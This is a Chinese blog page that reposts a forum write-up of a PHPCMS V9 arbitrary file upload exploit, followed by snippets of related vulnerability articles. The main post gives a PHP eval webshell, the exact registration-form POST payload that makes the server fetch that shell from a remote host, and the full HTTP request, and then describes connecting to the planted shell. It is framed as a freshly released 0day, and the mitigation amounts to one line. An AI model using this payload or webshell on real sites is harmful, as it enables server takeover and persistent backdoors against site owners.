php168上传漏洞,Phpcms_V9任意文件上传漏洞的利用以及小小的分析

最新推荐文章于 2021-04-01 03:00:29 发布
最新推荐文章于 2021-04-01 03:00:29 发布
阅读量328 收藏
点赞数
文章标签: php168上传漏洞
博主分享了PHPCMS系统中发现的一个0day漏洞,展示了如何通过注册表单POST提交执行代码,包括本地文件读取和远程代码注入。通过Burp工具验证,虽然回显失败但实际已写入。建议关闭注册功能并期待官方补丁。
摘要由CSDN通过智能技术生成

本帖最后由 小爱_Joker 于 2017-4-10 10:05 编辑

去年的漏洞复现了 本地环境搭建  在官方下载的最新版本phpcms源码我冒着生命危险 放出的0day

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170410171149.jpg (14.64 KB, 下载次数: 81)

2017-4-10 17:11 上传

各位看完后 记得评论下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410163900.png (56.14 KB, 下载次数: 92)

2017-4-10 16:46 上传

主要是注册哪里 post提交

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410164727.png (58.15 KB, 下载次数: 79)

2017-4-10 16:47 上传

这里我在本地准备一个1.txt文件 我们的一句话

[AppleScript] 纯文本查看 复制代码<?php @eval($_POST[cmd]);?>

0day

[AppleScript] 纯文本查看 复制代码siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=1.txt?.php#.jpg&dosubmit=1&protocol=

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165025.png (106.1 KB, 下载次数: 89)

2017-4-10 16:50 上传

也可以在远程服务器 放一个文本文件

http://192.168.0.3/phpcms/1.txt

远程服务器 比如 我在www.w3bsafe.cn/1.txt 放一个一句话 txt文件的

改下0day即可

是我本地的文件文件地址 里面有一句话 上面我说了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165220.png (35.59 KB, 下载次数: 89)

2017-4-10 16:52 上传

Post提交一下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165436.png (82.18 KB, 下载次数: 104)

2017-4-10 16:54 上传

菜刀链接

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165535.png (55.3 KB, 下载次数: 92)

2017-4-10 16:55 上传

burp操作验证

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410180203.png (97.61 KB, 下载次数: 103)

2017-4-10 18:02 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410180216.png (19.11 KB, 下载次数: 81)

2017-4-10 18:02 上传

回显操作失败 但是他已经写入进去了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.gif (746 KB, 下载次数: 89)

2017-4-10 18:04 上传

[AppleScript] 纯文本查看 复制代码POST /phpcms/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

Host: 192.168.0.3

Content-Length: 158

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: [url]http://192.168.0.3[/url]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded

Referer: [url]http://192.168.0.3/phpcms/index.php?m=member&c=index&a=register&siteid=1[/url]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: duiqS_admin_username=e2148Lx9jxWqd27zJW60NoZECjpCzY-kJHaDRtsJdNN-D14; duiqS_siteid=7f10PWN8e2aLJ8cDReSbX_NTPYZUwUTTf0QLOMix; duiqS_userid=d73dm3IxOKQZiIl0oDUfv1qRKPN7eYkeRy4xYTe2; duiqS_admin_email=fe549jr0y5NPbP8-awEI3pa2RERM9d6oloN6wm9p0LqSCnT0MqQ69lB8RxYNpA; duiqS_sys_lang=ed63dNwVysDCLfwqVe_ZO7ldqXSRC0O1cpABQ5YimBw-4A; BEEFHOOK=Y2fW9i6P441d2vBvjLkgKjlcdTaAj8URI1T1Z7Wx9nZtMJEcrTkp5o7B0uI7AjQr5RsfoGc8ZtlG8U3F; PHPSESSID=o2l47tha69a46khl82341gc8m0

Connection: close

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=1.txt?.php#.jpg&dosubmit=1&protocol=

总结:自我感觉 关闭注册  临时解决 =-= 官方会出补丁

结束语:黑阔们轻点. 毕竟这个漏洞刚复现不久  ....

pdf文件

a6527a6e1b57e0b5e0b313df30247628.gif

2017-4-10 17:04 上传

点击文件名下载附件

下载积分: 魔法币 -5

看文章记得评论下 感谢. 拒绝伸手党

weixin_39646412
关注
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4662
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
PHP168 CMS的一次新异漏洞分析
cnbird's blog
07-20 2295
admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞if( $_POST[loginname] && $_POST[loginpwd] ){if( $webdb[yzImgAdminLogin] ){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){die("验证码不符合");}else{set_c
php168系统漏洞,php168某系统注入漏洞
weixin_28885435的博客
03-29 362
漏洞概要缺陷编号:WooYun-2012-013476漏洞标题:php168某系统注入漏洞相关厂商:PHP168漏洞作者:书生提交时间:2012-10-17 22:33公开时间:2012-10-17 22:33漏洞类型:SQL注射漏洞危害等级:高自评Rank:20漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-10-17: 积极联系厂商并且等待厂商认领中,细节不对外...
php168的一个漏洞
qq_15618849的专栏
03-10 1660
这个问题是程序员容易忽略的,往往只是依靠gpc或addslashes函数对用户直接输入的数据进行处理,这样数据中的'"等都会被\转义,这样就能正确的执行sql语句,有效防止注入攻击了。但存入数据库的数据呢?在执行完sql语句存入数据库的是经过gpc处理前的原始数据,那么当程序再select出的就是受污染的数据了,如果把select出的数据再执行sql语句,那么就触发了sqlinj,如果直接写入缓存
php 168,PHP168一个神奇的漏洞,可查询任意用户数据
weixin_39914107的博客
03-10 1196
国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile以PHP168官方演示站点为例,查看任意用户信息的页面...
phpcms_v9 后台上传图片按钮无法点击
06-21
PHP CMS v9在设计时可能依赖于Flash来处理文件上传,导致在当前环境下,当尝试上传图片时,按钮无响应。 要解决这个问题,我们需要将原有的基于Flash的图片上传插件替换为HTML5的图片上传插件。HTML5提供了File API...
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
phpcms_v9_beta_GBK.zip_PHPCMS_V9_beta
09-23
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的...
代码审计_PHPCMS_V9前台RCE挖掘分析1
08-03
代码审计_PHPCMS_V9前台RCE挖掘分析1
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
php168 blog,PHP168 CMS的一次新异漏洞分析
weixin_32019949的博客
03-20 347
作者:李丰初admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞if( $_POST[loginname] && $_POST[loginpwd] ){if( $webdb[yzImgAdminLogin] ){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){die("验证码不符合...
ctf php168,CTF—攻防练习之HTTP—PUT上传漏洞
weixin_39830225的博客
04-01 116
主机:192.168.32.152靶机:192.168.32.159中间件PUT漏洞包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等)每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录扫描靶机端口: 然后...
PHP168 6.0及以下版本漏洞
CURSED!
09-23 245
PHP168 6.0及以下版本漏洞 # 鬼仔:未测试。最近比较忙,所以很多东西都更新不及时,也有好多没贴上来,抱歉,这几天整理下,把积攒的都更新了。 来源:chinesehonker 危险等级:高 影响版本:PHP168 6.0以下版本 入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 测试语...
php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_30695935的博客
03-11 864
PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...
php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP
weixin_35958479的博客
03-10 287
漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...
PHP168整站系统0DAY漏洞预警
Jim的博客
09-25 2336
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。 http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" http://dabei.org//job.php?job=download&ur
Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞
weixin_39637711的博客
03-27 203
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双...
php168上传漏洞,CVE-2009-2265 FCKeditor connector.php任意文件上传漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_40002692的博客
03-28 407
### $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值